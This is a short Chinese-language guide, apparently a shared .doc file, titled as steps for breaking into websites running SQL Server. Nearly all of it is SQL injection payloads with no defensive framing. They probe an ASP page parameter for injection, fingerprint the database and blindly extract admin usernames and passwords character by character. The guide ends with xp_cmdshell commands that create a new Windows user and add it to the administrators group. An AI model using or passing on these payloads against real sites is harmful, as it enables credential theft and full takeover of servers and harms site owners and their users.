sql server 数据库网站入侵步骤
- 格式:doc
- 大小:23.50 KB
- 文档页数:2
sql server 数据库网站入侵步骤
MS-SQL地址栏注入思路1:
1.判断注入点
先看地址栏格式如下:www.***.com/aa.asp?id=yy
'单引号 异常
and 1=1 正常
and 1=2 异常
2.判断数据库类型
and (select count (*) from msysobjects)>0 access异常
and (select count (*) from sysobjects)>0 mssql正常
ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,
而MS-SQL的系统表是sysobjects,在WEB环境下有访问权限。
3.猜表名\列名
and 0<>(select count(*) from 表名admin)
and 0<>(select count(列名username) from admin)
and 0<>(select count(列名password) from admin)
4.猜列长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(username) from admin)>1
and (select top 1 len(username) from admin)>2
and (select top 1 len(username) from admin)>3
猜username字段长度是否大于0,依次递增,直到报错为止
and (select top 1 len(password) from admin)>0
and (select top 1 len(password) from admin)>1
and (select top 1 len(password) from admin)>2
and (select top 1 len(password) from admin)>3
猜password字段长度是否大于0,依次递增,直到报错为止
4.猜字段值
and (select top 1 ascii(substring(username,1,1)) from admin)>0
and (select top 1 ascii(substring(username,1,1)) from admin)>1
and (select top 1 ascii(substring(username,1,1)) from admin)>2
and (select top 1 ascii(substring(username,1,1)) from admin)>3
猜username字段第一个字符的ascii码是否大于0,依次递增,直到报错为止
and (select top 2 ascii(substring(username,2,2)) from admin)>0
and (select top 2 ascii(substring(username,2,2)) from admin)>1
and (select top 2 ascii(substring(username,2,2)) from admin)>2
and (select top 2 ascii(substring(username,2,2)) from admin)>3
猜username字段第一个字符的ascii码是否大于0,依次递增,直到报错为止
*******************************************************************************
******
MS-SQL注入思路2:
1.判断sqlserver用户及权限
and 'sa'=(select system_user)
and 1=(select is_srvrolemember('sysadmin'))
2.确定xp_cmdshell可执行情况
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name
=
'xp_cmdshell')
3.通过xp_cmdshell直接执行cmd命令
;exec master.dbo.xp_cmdshell 'net user test test /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'